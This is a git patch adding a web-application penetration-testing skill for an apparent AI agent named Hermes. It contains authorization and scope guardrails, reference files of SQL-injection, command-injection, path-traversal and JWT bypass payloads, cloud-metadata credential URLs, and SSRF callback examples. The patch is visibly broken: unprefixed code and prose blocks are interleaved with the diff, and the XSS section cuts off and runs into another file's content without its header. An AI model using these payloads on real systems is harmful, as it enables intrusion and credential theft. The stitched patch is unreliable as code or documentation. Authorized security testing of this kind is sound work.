From 263e008d6bebbf3c7f67eaff8c4d71429c9b361f Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Mon, 25 May 2026 14:51:41 -0700
Subject: [PATCH] feat(skills): add web-pentest optional skill (#32265)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds optional-skills/security/web-pentest/ — an authorized web app
penetration testing skill adapted from Shannon's methodology (concepts
only; AGPL-clean fresh implementation).

Phased: recon (read-only) → vuln analysis (delegate_task per OWASP
class) → proof-based exploitation → report.

Guardrails baked in:
- Authorization gate before first active scan (templates/authorization.md)
- Scope allowlist (scope.txt) consulted by recon-scan.sh and documented
  as the rule for every active request
- Aux-client leakage warning (compression + title gen replay history;
  payloads/creds must not enter chat verbatim)
- Bypass-exhaustion discipline before false-positive classification
- L3/L4 (proof-required) for reportable findings; L1/L2 listed as
  candidates only

Closes #400. Supersedes #21845 (plugin-shaped proposal; skill-shaped is
cheaper and matches the existing optional-skills/security/ pattern).
---
 optional-skills/security/web-pentest/SKILL.md | 333 ++++++++++++++++++
 .../references/bypass-techniques.md | 133 +++++++
 .../references/exploitation-techniques.md | 204 +++++++++++
 .../references/scope-enforcement.md | 110 ++++++
 .../web-pentest/references/vuln-taxonomy.md | 81 +++++
 .../web-pentest/scripts/recon-scan.sh | 126 +++++++
 .../web-pentest/templates/authorization.md | 69 ++++
 .../templates/exploitation-queue.json | 34 ++
 .../web-pentest/templates/pentest-report.md | 178 ++++++++++
 9 files changed, 1268 insertions(+)
 create mode 100644 optional-skills/security/web-pentest/SKILL.md
 create mode 100644 optional-skills/security/web-pentest/references/bypass-techniques.md
 create mode 100644 optional-skills/security/web-pentest/references/exploitation-techniques.md
 create mode 100644 optional-skills/security/web-pentest/references/scope-enforcement.md
 create mode 100644 optional-skills/security/web-pentest/references/vuln-taxonomy.md
 create mode 100755 optional-skills/security/web-pentest/scripts/recon-scan.sh
 create mode 100644 optional-skills/security/web-pentest/templates/authorization.md
 create mode 100644 optional-skills/security/web-pentest/templates/exploitation-queue.json
 create mode 100644 optional-skills/security/web-pentest/templates/pentest-report.md

diff --git a/optional-skills/security/web-pentest/SKILL.md b/optional-skills/security/web-pentest/SKILL.md
new file mode 100644
index 00000000000..1ea82f8f0a7
--- /dev/null
+++ b/optional-skills/security/web-pentest/SKILL.md
@@ -0,0 +1,333 @@
+---
+name: web-pentest
+description: |
+  Authorized web application penetration testing — reconnaissance, vulnerability
+  analysis, proof-based exploitation, and professional reporting. Adapts
+  Shannon's "No Exploit, No Report" methodology with hard guardrails for
+  scope, authorization, and aux-client leakage. Active testing against running
+  applications you own or have written authorization to test.
+platforms: [linux, macos]
+category: security
+triggers:
+  - "pentest [URL]"
+  - "pentest this app"
+  - "penetration test [URL]"
+  - "security test this web app"
+  - "test [URL] for vulnerabilities"
+  - "find vulns in [URL]"
+  - "OWASP test [URL]"
+toolsets:
+  - terminal
+  - web
+  - browser
+  - file
+  - delegation
+---
+
+# Web Application Penetration Testing
+
+A phased pentesting workflow for running web applications. Adapted from
+Shannon's pipeline (Keygraph, AGPL — concepts only, no code borrowed).
+Built around three rules:
+
+1. No exploit, no report — every finding requires reproducible evidence.
+2. Bounded scope — every active request goes against a target the operator
+   pre-declared. Off-scope hosts are refused.
+3. Bypass exhaustion before false-positive dismissal — a "blocked" payload
+   is not a clean bill of health until you've tried the bypass set.
+
+---
+
+## ⚠️ Hard Guardrails — Read Before Every Engagement
+
+Violating any of these invalidates the engagement and may be illegal.
+
+1. **Authorization gate.** Before the first active scan in a session, you
+   MUST confirm with the user, in writing, that they own or have written
+   authorization to test the target. Record the acknowledgement in
+   `engagement/authorization.md` (see template). No acknowledgement → no
+   active scanning. Reading public pages with `curl` is fine; sending
+   payloads is not.
+
+2. **Scope allowlist.** Maintain `engagement/scope.txt` — one hostname or
+   CIDR per line. Every `nmap`, `curl`, `whatweb`, browser navigation, or
+   payload-bearing request MUST be against an entry in scope. If a target
+   redirects you off-scope (3xx to a different host, a link in HTML),
+   STOP and confirm with the user before following.
+
+3. **No production systems without paper.** If the user hasn't told you
+   "yes, prod is in scope and I have written sign-off," assume not. Default
+   targets are staging, local docker, dedicated test instances.
+
+4. **Cloud metadata is off by default.** Do not probe `169.254.169.254`,
+   `metadata.google.internal`, `100.100.100.200`, `[fd00:ec2::254]`, or
+   equivalent unless the engagement explicitly includes SSRF-to-metadata
+   as a goal AND the target is one you control. The agent's browser tool
+   can reach these from inside your own infrastructure — don't.
+
+5. **Destructive payloads need approval.** SQLi payloads that DROP/DELETE,
+   filesystem-write SSTI, command injection with `rm`/`shutdown`/`mkfs`,
+   anything that mutates beyond a single test row → ASK FIRST. The
+   `approval.py` system catches some; don't rely on it alone.
+
+6. **Aux-client leakage risk (Hermes-specific).** This skill produces
+   sessions full of SQLi/XSS/RCE payloads, captured credentials, JWT
+   tokens. Hermes' compression and title-generation paths replay history
+   through the auxiliary client (often the main model). Anything sensitive
+   you write to the conversation can leave the box on the next compress.
+   Mitigation:
+   - Redact captured tokens/credentials to the LAST 6 CHARS before logging
+     them in any message. Full values go to `engagement/evidence/` files,
+     never into chat history.
+   - If the engagement is sensitive, set `auxiliary.title_generation.enabled: false`
+     in `~/.hermes/config.yaml` for the session.
+
+7. **Rate limit yourself.** Default 200ms between active requests against
+   any single host. The recon-scan.sh script enforces this. Don't bypass
+   it without operator approval.
+
+8. **Authority of the report.** This skill produces a security
+   assessment, not a "PASS." Even a clean run is "no exploitable issues
+   FOUND in scope X within time T using methods Y" — not "the application
+   is secure." Mirror that language in the report.
+
+---
+
+## Phase 0: Engagement Setup
+
+Before any scanning happens, create the engagement directory and
+authorization acknowledgement.
+
+```bash
+ENGAGEMENT=engagement-$(date +%Y%m%d-%H%M%S)
+mkdir -p "$ENGAGEMENT"/{evidence,findings,reports}
+cd "$ENGAGEMENT"
+```
+
+1. **Ask the user (verbatim):**
+   > "Confirm: (a) the target URL is [X], (b) you own this application
+   > or have written authorization to test it, and (c) the engagement
+   > may run for up to [N] hours starting now. Reply 'authorized' to
+   > proceed."
+
+2. **Wait for explicit `authorized` response.** Any other answer means STOP.
+
+3. **Record authorization** to `engagement/authorization.md` using the
+   template in `templates/authorization.md`. Include:
+   - Target URL(s) and IP(s)
+   - Authorization basis (ownership / written authz from $name)
+   - Engagement window
+   - Out-of-scope items (production, third-party services, etc.)
+   - Operator name (the user driving this session)
+
+4. **Build scope.txt:**
+   ```
+   localhost
+   127.0.0.1
+   staging.example.com
+   192.168.1.0/24 # internal lab only, with operator OK
+   ```
+
+5. **Read** `references/scope-enforcement.md` before issuing the first
+   active request — that doc has the host-extraction rules you apply
+   to every command/URL before it goes out.
+
+---
+
+## Phase 1: Pre-Recon (Code Analysis, optional)
+
+Skip if no source access (black-box engagement).
+
+If you have read access to the application source:
+
+1. **Map the architecture** — framework, routing, middleware stack
+2. **Inventory sinks** — every `execute(`, `os.system(`, `eval(`,
+   template render, file read/write, redirect target
+3. **Map auth** — session cookie vs JWT, OAuth flows, password reset,
+   privileged endpoints
+4. **Identify trust boundaries** — what's authenticated, what's not,
+   what comes from `request.*`
+5. **Backward taint** from each sink to a request source. Early-terminate
+   when proper sanitization is found (parameterized queries, allowlists,
+   `shlex.quote`, well-known escapers).
+
+Output: `evidence/pre-recon.md` — architecture map, sink inventory,
+suspected vulnerable code paths.
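
The sink inventory in step 2 could be bootstrapped with a small offline scanner. The following is a minimal sketch, not part of the skill: `SINK_PATTERNS`, `find_sinks`, and `inventory` are hypothetical names, the pattern list covers only the three spellings named in step 2, and it assumes a Python code base. A regex pass like this only produces candidates; the backward-taint step still has to be done by reading the code.

```python
import re
from pathlib import Path
from typing import List, Tuple

# Hypothetical starter list: only the sink spellings named in step 2.
# Extend per framework (template renders, file I/O, redirects, ...).
SINK_PATTERNS = {
    "sql-execute": re.compile(r"\bexecute\("),
    "os-system": re.compile(r"\bos\.system\("),
    "eval": re.compile(r"\beval\("),
}


def find_sinks(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, sink_label) for every pattern hit in source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in SINK_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


def inventory(root: str) -> List[str]:
    """Walk root for *.py files and format each hit as 'path:line label'."""
    rows = []
    for path in sorted(Path(root).rglob("*.py")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, label in find_sinks(text):
            rows.append(f"{path}:{lineno} {label}")
    return rows
```

Calling `inventory("path/to/app")` returns rows that can be pasted into `evidence/pre-recon.md`. The word-boundary anchors keep `ast.literal_eval(` from being reported as `eval(`. Nothing here touches the network.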
+
+This is OFFLINE work. No traffic to the target.
+
+---
+
+## Phase 2: Recon (Live, Read-Only)
+
+Maps the attack surface. All requests are GETs of public pages, no
+payloads yet. Still scope-bounded.
+
+1. **Verify scope.** Resolve every target hostname → IP. Confirm IPs are
+   in scope (avoids the "DNS points somewhere unexpected" trap).
+
+2. **Network surface** (only if scope permits port scanning):
+   ```bash
+   nmap -sT -T3 --top-ports 100 -oN evidence/nmap.txt $TARGET
+   ```
+   Use `-T3` (default), not `-T4/-T5`. Stealthier and avoids tripping
+   IDS/IPS in shared environments.
+
+3. **Tech fingerprint:**
+   ```bash
+   whatweb -v $TARGET_URL > evidence/whatweb.txt
+   curl -sIk $TARGET_URL > evidence/headers.txt
+   ```
+
+4. **Endpoint discovery:**
+   - Crawl the app with the browser tool (`browser_navigate`,
+     `browser_get_images`, follow links).
+   - Inspect `robots.txt`, `sitemap.xml`, `.well-known/*`.
+   - Use the developer tools network panel via browser tool to capture
+     XHR/fetch calls.
+
+5. **Auth surface:** Identify login, registration, password reset,
+   session cookie names, token formats. Do NOT send credentials yet —
+   just observe.
+
+6. **Correlate with pre-recon** (if you have source). For each
+   `evidence/pre-recon.md` finding, mark whether the live surface
+   confirms it's reachable.
+
+Output: `evidence/recon.md` — endpoints, technologies, auth model,
+input vectors.
+
+---
+
+## Phase 3: Vulnerability Analysis
+
+One delegate_task per vulnerability class. Each agent reads
+`evidence/recon.md` (+ `evidence/pre-recon.md` if present), produces
+`findings/-queue.json` using `templates/exploitation-queue.json`.
+
+Use `delegate_task` with these focused subagents (parallel where possible):
+
+| Class | Goal | Reference |
+|-------|------|-----------|
+| `injection` | SQLi, command, path traversal, SSTI, LFI/RFI, deserialization | `references/vuln-taxonomy.md` (slot types) |
+| `xss` | Reflected, stored, DOM-based | `references/vuln-taxonomy.md` (render contexts) |
+| `auth` | Login bypass, JWT confusion, session fixation, OAuth flaws | `references/exploitation-techniques.md` |
+| `authz` | IDOR, vertical/horizontal escalation, business logic | `references/exploitation-techniques.md` |
+| `ssrf` | Internal reachability, metadata, protocol smuggling | Skip metadata unless explicitly authorized |
+| `infra` | Misconfig, info disclosure, default creds, exposed admin | `references/exploitation-techniques.md` |
+
+Each queue entry has: id, vuln class, source (file:line if known),
+endpoint, parameter, slot type, suspected defense, verdict
+(`identified` / `partial` / `confirmed` / `critical`), witness payload,
+confidence (0-1), notes.
+
+The analysis phase doesn't send malicious payloads yet — it stages them.
+The exploitation phase actually fires them.
+
+---
+
+## Phase 4: Exploitation (Proof-Based, Conditional)
+
+Only run a sub-agent per class where the analysis queue has actionable
+entries (`identified` or `partial`).
+
+For each candidate:
+
+1. **Pre-send check** — host in scope? auth gate satisfied? payload
+   approved if destructive?
+2. **Send the witness payload** — minimal proof. SQLi: `' AND 1=1--`
+   then `' AND 1=2--`. XSS: a benign marker like
+   ``. Never `alert(1)` in
+   stored XSS — it'll fire for other users in shared environments.
+3. **Verify the witness fires** — for blind injection, use a sleep
+   probe (`SLEEP(5)`) and time the response. For SSRF, use a
+   tester-controlled callback host you own (NOT a public service like
+   webhook.site for sensitive engagements — exfil paths).
+4. **Promote level:**
+   - **L1 Identified** — pattern matched, no behavior change
+   - **L2 Partial** — sink reached, but defense in place
+   - **L3 Confirmed** — payload changed app behavior in observable way
+   - **L4 Critical** — data extracted, code executed, access escalated
+5. **Bypass exhaustion before classifying as FP.** For each candidate
+   that blocks: try at least the bypass set in
+   `references/bypass-techniques.md` for that class. Only after the set
+   is exhausted may you write `verdict: false_positive`.
+6. **Record evidence** for every L3/L4:
+   - Full request (method, URL, headers, body)
+   - Response (status, headers, relevant body excerpt)
+   - Reproducer command (curl one-liner)
+   - Impact statement
+
+Output: `findings/exploitation-evidence.md`
+
+**Redact in evidence files:**
+- Any captured credentials/tokens → last 6 chars only in chat;
+  full value to `findings/secrets-vault.md` (gitignored).
+- Other users' PII → redact.
+- Your test credentials → fine to keep.
+
+---
+
+## Phase 5: Reporting
+
+Generate the final report using `templates/pentest-report.md`. Sections:
+
+1. Executive summary
+2. Engagement scope (from `engagement/scope.txt`)
+3. Authorization (from `engagement/authorization.md`)
+4. Findings (L3/L4 only — proof-required). Per finding:
+   - Title, severity (CVSS 3.1), CWE
+   - Affected endpoint(s)
+   - Proof (request + response excerpt)
+   - Reproduction steps
+   - Impact
+   - Remediation
+5. Not-exploited candidates (L1/L2 with notes on what blocked them)
+6. Out-of-scope observations
+7. Methodology / tools used
+8. Limitations and what was NOT tested
+
+**Severity policy:** CVSS only for L3/L4. L1/L2 are "candidates pending
+verification" — don't assign CVSS to unverified findings.
+
+---
+
+## When to Stop
+
+- The user revokes authorization.
+- A candidate finding clearly impacts production data and you don't have
+  approval for destructive testing — STOP and ask.
+- The target starts returning 503/429 storms — back off, reconvene with
+  the operator.
+- You discover something *outside* the contracted scope (e.g. an exposed
+  customer database while testing an unrelated endpoint). STOP, document,
+  report to the operator. Do not pivot without explicit approval — that
+  pivot is what makes pentesting illegal.
+
+---
+
+## What This Skill Does NOT Cover
+
+- Network-layer pentesting beyond port scanning (no Metasploit,
+  Cobalt Strike, AD attacks, network protocol fuzzing).
+- Reverse engineering / binary analysis (see issue #383).
+- Source-only static analysis (see issue #382).
+- Active social engineering / phishing.
+- Anything against systems the operator hasn't pre-authorized.
+
+If the engagement needs any of these, escalate to a professional
+pentester. This skill complements professional pentesting; it does
+not replace it.
+
+---
+
+## Further Reading
+
+- `references/scope-enforcement.md` — how to bound every active request
+- `references/vuln-taxonomy.md` — slot types, render contexts, OWASP map
+- `references/exploitation-techniques.md` — per-class payload patterns
+- `references/bypass-techniques.md` — common WAF/filter bypasses
+- `templates/authorization.md` — engagement authorization template
+- `templates/pentest-report.md` — final report template
+- `templates/exploitation-queue.json` — per-class finding queue schema
+- `scripts/recon-scan.sh` — rate-limited nmap+whatweb+headers wrapper
diff --git a/optional-skills/security/web-pentest/references/bypass-techniques.md b/optional-skills/security/web-pentest/references/bypass-techniques.md
new file mode 100644
index 00000000000..aef2a18bf8b
--- /dev/null
+++ b/optional-skills/security/web-pentest/references/bypass-techniques.md
@@ -0,0 +1,133 @@
+# Bypass Techniques
+
+Common filter/WAF bypasses. Used during the bypass-exhaustion phase
+before classifying a finding as false positive.
+
+A finding may only be marked `false_positive` AFTER the relevant
+bypass set has been exhausted and the witnesses still fail.
+
+## SQL Injection Bypasses
+
+When `'` is filtered/escaped:
+- Numeric injection: drop the quote, use `1 OR 1=1`
+- Different quote: `"` instead of `'`
+- Comment-based: `1/**/OR/**/1=1`
+- Hex literal: `0x61646d696e` for `admin`
+- `CHAR(65,66)` for `AB`
+- Case variation: `OoRr` (often stripped to `OR`)
+- Inline comments: `O/**/R`
+- Null byte: `' %00 OR '1`=`1`
+- Double URL encoding: `%2527` for `'`
+- Multi-byte: `%bf%27` (works against some single-byte unescape)
+
+## Command Injection Bypasses
+
+When semicolons filtered:
+- Newline: `%0Asleep 5`
+- Carriage return: `%0Dsleep 5`
+- Pipe: `|sleep 5`, `||sleep 5`
+- Background: `&sleep 5`, `&&sleep 5`
+- Substitution: `$(sleep 5)`, `` `sleep 5` ``
+- Globbing: `/???/?l??p 5` for `/bin/sleep 5`
+- IFS for spaces: `sleep${IFS}5`, `sleep$IFS$95`
+- Quote evasion: `s""leep 5`, `s'l'eep 5`
+- Variable: `a=sl;b=eep;${a}${b} 5`
+- Encoding: `bash<<<$(base64 -d <<< c2xlZXAgNQo=)`
+
+## Path Traversal Bypasses
+
+When `../` filtered:
+- URL-encoded: `%2e%2e%2f`
+- Double URL-encoded: `%252e%252e%252f`
+- Unicode: `%c0%ae%c0%ae%c0%af`, `%uff0e%uff0e%u2215`
+- Mixed: `..%2f`, `%2e./`
+- Null byte (older platforms): `../../../etc/passwd%00.png`
+- Backslash on Windows: `..\..\..\windows\win.ini`
+- Absolute path: `/etc/passwd` (skips traversal entirely)
+
+When base dir is prepended (`/var/www/uploads/${v}`):
+- The traversal still works if `realpath` not enforced
+- Try ending the path early: `../../etc/passwd%00`
+
+## XSS Bypasses
+
+When ``
+- ``
+- ``. Confirm the
+sink fires.
+
+## Auth
+
+### Login Bypass
+
+- SQLi in login: `' OR '1'='1` (very old, but check)
+- Boolean defaults: `username: admin, password: admin/password/123456`
+  (only on lab targets, not production)
+- Account enumeration: timing or response difference between
+  "unknown user" vs "wrong password"
+- Rate limiting: send 50 wrong passwords in 30s; see if you're throttled
+
+### JWT Attacks
+
+1. **alg:none**: change header to `{"alg":"none","typ":"JWT"}`, strip
+   signature. If accepted → critical.
+2. **alg confusion**: HS256 signed with the RS256 public key. If the
+   server stores the RS256 cert as a "secret" and the algorithm is
+   attacker-controlled, this works.
+3. **Weak HMAC secret**: try `jwt_tool` or `hashcat` against the JWT
+   with rockyou.txt (only if you have operator OK to crack).
+4. **kid header injection**: `kid` set to a SQLi payload or path-traversal
+   to load a known key.
+5. **Expired token still accepted**: replay an old token.
+
+### Session
+
+- Cookie attrs: `Secure`, `HttpOnly`, `SameSite=Strict|Lax`.
+- Session fixation: log in, note cookie, log out, log in again — same
+  cookie? Vulnerable.
+- Logout: does logout invalidate server-side, or just clear the client?
+
+### Password Reset
+
+- Predictable token (timestamp, sequential, weak random)
+- Host header poisoning in reset link (`Host: evil.test`)
+- No rate limit on reset endpoint
+- Token reuse / no expiry
+- Email enumeration via reset response
+
+## Authz (Access Control)
+
+### IDOR
+
+Pattern: change `?id=123` to `?id=124`. If you see another user's data,
+L3 confirmed.
+
+Variants:
+- Sequential IDs (easy)
+- UUIDs (still try — they leak in logs/responses)
+- Mass assignment: send extra params like `is_admin: true`, `role: admin`
+- HTTP method override: `GET /users/123` works, but `PUT /users/123` is
+  not authz-checked
+
+### Privilege Escalation
+
+Vertical: regular user → admin endpoint. Check:
+- `/admin/*` accessible to non-admin?
+- `role` field in JWT/session client-editable?
+- Tenant ID swap: `tenant_id=mine` → `tenant_id=theirs`
+
+Horizontal: user A → user B same role. Reuse IDOR patterns.
+
+### Business Logic
+
+- Negative quantity in cart
+- Race conditions (double-spend, atomicity)
+- Workflow skip (POST to step 3 without doing step 2)
+- Coupon stacking
+- Discount > total
+
+## SSRF
+
+Witnesses for SSRF probing (only to hosts the operator approved):
+
+- Operator-owned callback (`https://hermes-callback.example/abcdef`)
+  — confirms the request left the target's network
+- Internal recon (operator OK + scope): `http://127.0.0.1:6379/`,
+  `http://127.0.0.1:9200/`, `http://[::1]:80/`
+
+Cloud metadata (operator OK + your own infra):
+- AWS: `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
+- GCP: `http://metadata.google.internal/computeMetadata/v1/` (needs
+  `Metadata-Flavor: Google`)
+- Azure: `http://169.254.169.254/metadata/identity/oauth2/token`
+- Alibaba/Aliyun: `http://100.100.100.200/`
+
+Protocol smuggling:
+- `gopher://` for Redis/Memcache/SMTP attacks (only with operator OK)
+- `file:///` for local file read
+- `dict://` for service probing
+
+## Infra
+
+- Headers audit: missing `Strict-Transport-Security`, `Content-Security-Policy`,
+  `X-Content-Type-Options: nosniff`, `X-Frame-Options`/`frame-ancestors`,
+  `Referrer-Policy`
+- TLS audit: weak ciphers, missing HSTS, mixed content
+- Information disclosure: `Server:`, `X-Powered-By:`, error stack traces,
+  default landing pages (`/server-status`, `/.git/`, `/.env`, `/phpinfo.php`)
+- Default creds: only on lab targets
+- Open redirects: `?next=https://evil.example/` — confirms misuse for
+  phishing chains
+
+## Defense Recognition (don't waste cycles)
+
+Skip past these — they're working defenses, not vulns:
+
+- Parameterized queries via the language's standard binding
+- Content Security Policy with no `unsafe-inline`/`unsafe-eval` and
+  a strict source list
+- argv-list subprocess invocation (Python `subprocess.run([...])`
+  without `shell=True`)
+- `yaml.safe_load`, JSON-only deserialization
+- Allowlist-based redirects to a small set of known hosts
+- Auth checks with explicit "owner == current_user" on every record fetch
+- JWT verification with both `alg` allowlist and `iss`/`aud`/`exp` checks
diff --git a/optional-skills/security/web-pentest/references/scope-enforcement.md b/optional-skills/security/web-pentest/references/scope-enforcement.md
new file mode 100644
index 00000000000..df019410fd4
--- /dev/null
+++ b/optional-skills/security/web-pentest/references/scope-enforcement.md
@@ -0,0 +1,110 @@
+# Scope Enforcement
+
+The pentest skill is dangerous because Hermes can drive network tools
+unattended. The single most important rule: **every active request must
+target a host the operator authorized.** This file is the procedure.
+
+## The Three Authorities
+
+1. `engagement/authorization.md` — what the operator wrote down.
+2. `engagement/scope.txt` — the machine-readable allowlist.
+3. The current shell prompt — implicit: "I'm running as Hermes inside
+   the operator's box."
+
+If any of those three disagree, you STOP and ask. Don't try to reconcile.
+
+## scope.txt format
+
+One target per line. Comments with `#`.
+
+```
+# Hostnames — resolved at use time
+localhost
+127.0.0.1
+::1
+staging.example.com
+api-staging.example.com
+
+# CIDR — internal labs only, requires operator OK in writing
+192.168.50.0/24
+10.0.5.0/24
+```
+
+Wildcards are NOT supported. If you need `*.staging.example.com`, list
+each host explicitly. This is on purpose: subdomain wildcards in
+authorization scope are how unauthorized testing happens.
+
+## Host Extraction Rules
+
+Before any active request, extract the target host from the command
+or URL and confirm it's in scope.
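
The extract-then-check rule can be sketched in Python using only the standard library. This is an illustrative sketch under stated assumptions, not the logic of `recon-scan.sh`: `load_scope`, `host_of`, and `in_scope` are hypothetical helper names, hostnames match exactly (no wildcards, per the format above), and no DNS resolution is performed, so the resolved-IP-in-CIDR check for hostnames would still have to be added.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlparse


def load_scope(text: str):
    """Parse scope.txt content into (exact hostnames, CIDR networks)."""
    hosts, networks = set(), []
    for raw in text.splitlines():
        entry = raw.split("#", 1)[0].strip().lower()  # drop comments
        if not entry:
            continue
        if "/" in entry:
            # A malformed CIDR raises ValueError: a bad scope file is loud.
            networks.append(ipaddress.ip_network(entry, strict=False))
        else:
            hosts.add(entry)
    return hosts, networks


def host_of(target: str) -> Optional[str]:
    """Extract the host from a URL or from a bare host/IPv4 argument."""
    try:
        parsed = urlparse(target if "://" in target else "//" + target)
        return parsed.hostname  # already lowercased; None when absent
    except ValueError:
        return None


def in_scope(target: str, hosts, networks) -> bool:
    """Fail closed: anything that cannot be positively matched is out."""
    host = host_of(target)
    if host is None:
        return False
    if host in hosts:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # unlisted hostname; DNS is not consulted here
    return any(addr in net for net in networks)
```

With a scope of `staging.example.com` plus `10.0.5.0/24`, `in_scope("https://auth.example.com/", ...)` returns `False`, which is the sister-host case this file warns about. Returning `False` on every uncertain path mirrors the "default: out of scope" rule.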
+
+| Surface | Where the host lives | Example |
+|---------|----------------------|---------|
+| `curl URL` | The URL | `curl https://staging.example.com/login` |
+| `curl --resolve HOST:PORT:ADDR` | HOST | reject — resolve overrides scope |
+| `nmap TARGET` | Each TARGET arg | `nmap 10.0.5.5 staging.example.com` |
+| `whatweb URL` | The URL | `whatweb https://staging.example.com` |
+| `browser_navigate(url)` | The URL | python-side: extract host from `url` |
+| Tool-driven HTTP (sqlmap, wfuzz, gobuster) | `-u`, `-h`, target arg | depends on tool |
+
+For URLs: `urllib.parse.urlparse(url).hostname.lower()`.
+For raw IPs: keep as IP, check against CIDR entries with
+`ipaddress.ip_address(host) in ipaddress.ip_network(cidr)`.
+
+## Pre-Send Checklist
+
+For every active request, before you press enter:
+
+1. Did you extract the host correctly? (URL host, not Host header, not
+   `--resolve` aliasing.)
+2. Is the host in scope.txt (exact hostname match) OR is its resolved
+   IP in a scope.txt CIDR?
+3. If it's a redirect target you're following, did you re-check scope
+   on the redirect URL?
+4. If it's the second hop of an SSRF probe, is the inner URL in scope?
+   (Usually NOT — that's the whole point. Don't auto-fire.)
+5. Did the operator approve this class of payload? (Read-only recon
+   is auto-OK; destructive payloads need explicit OK.)
+
+If any answer is "no" or "not sure," STOP and ask the operator.
+
+## Things That Look In-Scope But Aren't
+
+- **Redirects to a parent or sister host.** `staging.example.com` →
+  `auth.example.com` is a different host. Stop, re-confirm.
+- **CNAMEs.** `app.staging.example.com` may CNAME to
+  `prod-cluster.aws.example.com`. Resolve and check IP, not just name.
+- **Cloud metadata IPs.** `169.254.169.254` is not in any sane
+  scope.txt. If your SSRF candidate resolves there, you're probably
+  testing against a real cloud host and need explicit approval before
+  the probe.
+- **127.0.0.1 / localhost on a shared box.** If you're in a container
+  or shared dev box, `localhost` may be someone else's service.
+  Confirm with the operator that 127.0.0.1 means what they think.
+- **External services the target depends on.** Stripe API, OAuth
+  providers, S3 buckets — even if your tests would touch them, they
+  are NOT in scope by default.
+
+## When Scope Fails Open
+
+If you can't decide whether a host is in scope:
+
+```
+DEFAULT: out of scope.
+```
+
+Stop the agent. Ask the operator. Resume only after written
+confirmation. There is no penalty for asking; there is significant
+penalty for testing the wrong host.
+
+## Logging
+
+Every active request should append to `engagement/request-log.jsonl`:
+
+```json
+{"ts": "2026-05-25T03:14:15Z", "method": "GET", "url": "https://staging.example.com/api/users", "host": "staging.example.com", "in_scope": true, "phase": "recon", "result_status": 200, "evidence_ref": "evidence/recon.md#endpoints"}
+```
+
+This is your audit trail. If anyone ever asks "why did the pentest
+agent hit X?" you can answer from this log.
diff --git a/optional-skills/security/web-pentest/references/vuln-taxonomy.md b/optional-skills/security/web-pentest/references/vuln-taxonomy.md
new file mode 100644
index 00000000000..bed84d835b6
--- /dev/null
+++ b/optional-skills/security/web-pentest/references/vuln-taxonomy.md
@@ -0,0 +1,81 @@
+# Vulnerability Taxonomy
+
+Two classification systems used during analysis. Both come from Shannon
+(concepts only; rewritten here). Both exist to make the question
+"is this exploitable?" mechanical instead of vibes-based.
+
+## Injection: Slot Types
+
+Every injection sink has a **slot type** — the lexical position the
+attacker payload lands in. Each slot type has a small set of
+**required defenses**. A mismatch is a vulnerability. The same defense
+applied to the wrong slot is also a vulnerability.
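
To make "the same defense applied to the wrong slot" concrete, here is a minimal sketch using Python's built-in `sqlite3`. The table, the allowlists, and the function names (`list_users`, `demo_connection`) are assumptions made for illustration only. It shows one query with three slots: a value slot that takes a bound parameter, and an identifier slot and a keyword slot that cannot be bound and therefore need allowlists.

```python
import sqlite3

# Hypothetical allowlists for the identifier and keyword slots.
ALLOWED_SORT_COLUMNS = {"id", "name"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def list_users(conn, name_pattern, sort_col, direction):
    # Identifier and keyword slots: "?" placeholders cannot stand in for a
    # column name or ASC/DESC, so these are validated against allowlists.
    if sort_col not in ALLOWED_SORT_COLUMNS:
        raise ValueError("sort column not allowed")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("sort direction not allowed")
    # Value slot: passed as a bound parameter, never concatenated.
    query = (
        "SELECT id, name FROM users WHERE name LIKE ? "
        f"ORDER BY {sort_col} {direction}"
    )
    return conn.execute(query, (name_pattern,)).fetchall()


def demo_connection():
    """Build an in-memory database with two rows for experimentation."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)]
    )
    return conn
```

A classic value-slot payload such as `' OR '1'='1` is treated as an ordinary string by the binding and matches no rows. A payload in the sort column is rejected before any SQL is built. Escaping quotes in `sort_col` would not help, because an identifier slot needs no quote to break out of.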
+
+| Slot | Example | Required defense |
+|------|---------|------------------|
+| `SQL-val` | `SELECT * FROM u WHERE id = :v` | Parameterized binding |
+| `SQL-ident` | `SELECT * FROM ${table}` | Allowlist on identifier values |
+| `SQL-keyword` | `ORDER BY ${col} ${dir}` | Allowlist on column AND direction |
+| `CMD-argument` | `subprocess.run(["ls", v])` | argv list (never shell=True) |
+| `CMD-shell` | `os.system("ls " + v)` | DON'T — refactor to argv list |
+| `PATH-segment` | `open("/data/" + v)` | Normalize + allowlist + base-relative check |
+| `URL-host` | redirect to `https://${v}/x` | Allowlist of acceptable hosts |
+| `URL-fetch` | `requests.get(v)` | Allowlist + block private/metadata IPs (SSRF) |
+| `TEMPLATE-string` | `Template("Hello {{ v }}")` | Autoescape ON, no user-controlled template syntax |
+| `DESERIALIZE-pickle` | `pickle.loads(v)` | DON'T — use JSON / msgpack |
+| `DESERIALIZE-yaml` | `yaml.load(v)` | `yaml.safe_load`, never `yaml.load` |
+| `XPATH-expr` | `tree.xpath("//u[@id='" + v + "']")` | Parameterized XPath or escape |
+| `LDAP-filter` | `(uid=${v})` | LDAP filter escaping |
+| `REGEX-pattern` | `re.search(v, text)` | Don't take pattern from user (ReDoS too) |
+| `LOG-record` | `log.info("got " + v)` | Encode CR/LF/control chars before logging |
+| `EMAIL-header` | `Subject: ${v}` | Reject CR/LF |
+| `HTTP-header` | `Set-Cookie: ${v}` | Reject CR/LF (response splitting) |
+
+When you classify a finding:
+1. Identify the slot type
+2. Identify the actual defense in the code (if you have source)
+3. If defense doesn't match the required-defense set: vulnerable
+
+## XSS: Render Contexts
+
+XSS exploitability depends on **where** in the HTML/JS the value lands.
+Encoding for one context doesn't protect another.
+
+| Context | Example | Required encoding |
